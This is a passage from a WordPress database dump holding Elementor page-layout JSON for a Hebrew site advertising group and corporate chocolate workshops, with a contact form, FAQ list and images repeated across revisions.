Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"67cc34f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"6c196b7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7827cc50\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7b209b5a\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05de\\u05e9\\u05e8\\u05d3 \\/ \\u05d1\\u05d9\\u05ea (\\u05d0\\u05ea\\u05dd \\u05ea\\u05d7\\u05dc\\u05d9\\u05d8\\u05d5)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d1\\u05d9\\u05df \\u05e9\\u05e2\\u05ea\\u05d9\\u05d9\\u05dd \\u05dc4\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05dc\\u05d0, \\u05d0\\u05dc \\u05ea\\u05d1\\u05d9\\u05d0\\u05d5 \\u05e1\\u05d9\\u05e0\\u05e8, \\u05d6\\u05d4 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05d0\\u05ea\\u05dd \\u05ea\\u05e7\\u05d7\\u05d5 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d4 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d4\\u05db\\u05e0\\u05ea\\u05dd (\\u05d0\\u05dd \\u05d9\\u05d9\\u05e9\\u05d0\\u05e8)\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05dc\\u05d0, \\u05dc\\u05d0 \\u05de\\u05e9\\u05e0\\u05d4 \\u05db\\u05de\\u05d4 \\u05d0\\u05e0\\u05e9\\u05d9\\u05dd \\u05d9\\u05d4\\u05d9\\u05d5, \\u05d0\\u05ea\\u05dd \\u05ea\\u05d7\\u05dc\\u05d9\\u05d8\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"741268fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2e2f4f1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1379,281,'_elementor_version','0.4'),(1380,281,'_elementor_template_type','post'),(1382,282,'_wp_page_template','elementor_header_footer'),(1383,282,'_elementor_edit_mode','builder'),(1384,282,'_elementor_data','[{\"id\":\"18f6a107\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"305b0fba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"50499c10\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4eb9f6ca\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2d2198b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"79ff081e\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea (\\u05e7\\u05d8\\u05e0\\u05d5\\u05ea \\/ \\u05d2\\u05d3\\u05d5\\u05dc\\u05d5\\u05ea)\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"cdcd955\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/groups-choco.jpg\",\"id\":104},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4d880f94\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05d0\\u05dd \\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05e7\\u05d7\\u05ea \\u05d9\\u05d5\\u05dd \\u05db\\u05d9\\u05e3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d4\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4, \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d4\\u05db\\u05d9\\u05e8 \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05db\\u05d5\\u05df \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05dc\\u05d0\\u05d9\\u05d2\\u05d5\\u05d3 \\u05d7\\u05d1\\u05e8\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8.\\u00a0<\\/strong><\\/p><p>\\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05d6\\u05d0\\u05ea \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05db\\u05d6\\u05d5 \\u05e9\\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05d1\\u05e7\\u05d1\\u05d5\\u05e6\\u05d4 \\u05d9\\u05ea\\u05d7\\u05dc\\u05e7\\u05d5 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea \\u05d5\\u05d9\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05de\\u05e0\\u05d5\\u05ea \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d5\\u05ea \\u05e2\\u05dc\\u05d9\\u05d4\\u05dd, \\u05d4\\u05d7\\u05dc \\u05de\\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e2\\u05e8\\u05d1\\u05d5\\u05d1 \\u05d5\\u05d6\\u05d9\\u05dc\\u05d5\\u05e3 \\u05dc\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05e0\\u05d5\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8 \\u05e9\\u05d0\\u05ea\\u05dd \\u05e8\\u05d2\\u05d9\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05d9\\u05ea\\u05d5 \\u05e1\\u05dc\\u05d8, \\u05dc\\u05d0 \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d3\\u05e2\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d2\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7?\\u00a0<\\/p><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fd9ed4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"16c16700\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"76bff3cc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"67cc34f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"6c196b7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7827cc50\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7b209b5a\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05de\\u05e9\\u05e8\\u05d3 \\/ \\u05d1\\u05d9\\u05ea (\\u05d0\\u05ea\\u05dd \\u05ea\\u05d7\\u05dc\\u05d9\\u05d8\\u05d5)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d1\\u05d9\\u05df \\u05e9\\u05e2\\u05ea\\u05d9\\u05d9\\u05dd \\u05dc4\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05dc\\u05d0, \\u05d0\\u05dc \\u05ea\\u05d1\\u05d9\\u05d0\\u05d5 \\u05e1\\u05d9\\u05e0\\u05e8, \\u05d6\\u05d4 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05d0\\u05ea\\u05dd \\u05ea\\u05e7\\u05d7\\u05d5 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d4 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d4\\u05db\\u05e0\\u05ea\\u05dd (\\u05d0\\u05dd \\u05d9\\u05d9\\u05e9\\u05d0\\u05e8)\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05dc\\u05d0, \\u05dc\\u05d0 \\u05de\\u05e9\\u05e0\\u05d4 \\u05db\\u05de\\u05d4 \\u05d0\\u05e0\\u05e9\\u05d9\\u05dd \\u05d9\\u05d4\\u05d9\\u05d5, \\u05d0\\u05ea\\u05dd \\u05ea\\u05d7\\u05dc\\u05d9\\u05d8\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"741268fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2e2f4f1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1385,282,'_elementor_version','0.4'),(1386,282,'_elementor_template_type','post'),(1389,283,'_wp_page_template','elementor_header_footer'),(1390,283,'_elementor_edit_mode','builder'),(1391,283,'_elementor_data','[{\"id\":\"18f6a107\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"305b0fba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"50499c10\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4eb9f6ca\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2d2198b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"79ff081e\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea (\\u05e7\\u05d8\\u05e0\\u05d5\\u05ea \\/ \\u05d2\\u05d3\\u05d5\\u05dc\\u05d5\\u05ea)\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"cdcd955\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/groups-choco.jpg\",\"id\":104},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4d880f94\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05d0\\u05dd \\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05e7\\u05d7\\u05ea \\u05d9\\u05d5\\u05dd \\u05db\\u05d9\\u05e3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d4\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4, \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d4\\u05db\\u05d9\\u05e8 \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05db\\u05d5\\u05df \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05dc\\u05d0\\u05d9\\u05d2\\u05d5\\u05d3 \\u05d7\\u05d1\\u05e8\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8.\\u00a0<\\/strong><\\/p><p>\\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05d6\\u05d0\\u05ea \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05db\\u05d6\\u05d5 \\u05e9\\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05d1\\u05e7\\u05d1\\u05d5\\u05e6\\u05d4 \\u05d9\\u05ea\\u05d7\\u05dc\\u05e7\\u05d5 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea \\u05d5\\u05d9\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05de\\u05e0\\u05d5\\u05ea \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d5\\u05ea \\u05e2\\u05dc\\u05d9\\u05d4\\u05dd, \\u05d4\\u05d7\\u05dc \\u05de\\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e2\\u05e8\\u05d1\\u05d5\\u05d1 \\u05d5\\u05d6\\u05d9\\u05dc\\u05d5\\u05e3 \\u05dc\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05e0\\u05d5\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8 \\u05e9\\u05d0\\u05ea\\u05dd \\u05e8\\u05d2\\u05d9\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05d9\\u05ea\\u05d5 \\u05e1\\u05dc\\u05d8, \\u05dc\\u05d0 \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d3\\u05e2\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d2\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7?\\u00a0<\\/p><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fd9ed4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"16c16700\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"76bff3cc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\